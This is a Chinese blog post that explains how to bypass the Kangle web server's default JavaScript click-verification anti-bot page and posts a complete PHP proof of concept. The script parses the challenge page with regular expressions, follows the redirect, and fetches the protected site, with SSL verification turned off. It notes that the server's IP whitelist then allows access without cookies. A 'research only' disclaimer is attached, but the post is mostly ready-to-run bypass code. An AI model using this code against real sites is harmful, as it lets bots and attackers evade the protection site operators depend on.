Kangle默认的点击验证很简单 通过正则匹配即可完全bypass 其次kangle存在ip白名单 如短时间内通过一次验证 则无需cookie也可直接访问网站内容
贴上POC
<?php /* Bypass BY :wafcloud 仅作技术研究使用,严禁用于违法用途 正则即可处理默认kangle 的js点击验证 */ $cookie_jar = tempnam(‘./tmp’,’cookie’); function curl($cookieUrl,$url = ”, $addHeaders = [], $requestType = ‘get’, $requestData = ”, $postType = ”, $urlencode = true) { if (empty($url)) return ”; //容错处理 $headers = [ ‘User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.1; zh-CN; rv:2.9) Gecko/2018052906 Firefox/3.0’ // ‘Referer:’ . $url ]; if (strtolower($postType) == ‘json’ && $requestType != ‘get’) { $headers[] = ‘Content-Type: application/json; charset=utf-8’; $requestData = is_array($requestData) ? json_encode($requestData) : $requestData; $headers[] = ‘Content-Length: ‘ . strlen($requestData); } if (!empty($addHeaders)) $headers = array_merge($headers, $addHeaders); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl); curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //设置允许302转跳 // curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC); // curl_setopt($ch, CURLOPT_PROXY, ‘127.0.0.1’); // curl_setopt($ch, CURLOPT_PROXYPORT, ‘123’); //set proxy curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //add ssl if ($requestType == ‘get’) { curl_setopt($ch, CURLOPT_HEADER, false); } else if ($requestType == ‘post’) { curl_setopt($ch, CURLOPT_POST, 1); } else { curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType)); } //处理类型 if ($requestType != ‘get’) { if (is_array($requestData) && !empty($requestData)) { $temp = ”; foreach ($requestData as $key => $value) { if ($urlencode) { $temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’; } else { $temp .= $key . ‘=’ . $value . ‘&’; } } $requestData = substr($temp, 0, strlen($temp) – 1); } curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData); } $result = curl_exec($ch); curl_close($ch); return $result; } function isSafe($html) { return preg_match(‘/<title>安全防护系统<\/title>/’, $html) == 1; } function getSafeUrl($cookie_jar,$url) { $data = curl($cookie_jar,$url); if (isSafe($data)) { preg_match(‘/location.href =(.+);/’, $data, $result); if (count($result) == 2) { $result = $result[1]; $result = preg_replace(‘/”|\+/’, ”, $result); $result = preg_replace(‘/\s/’, ”, $result); return $url . $result; } } return ”; } echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.123.com/”));
转载请注明出处 AE博客|墨渊 » Kangle 点击验证JS Bypass过程以及poc
发表评论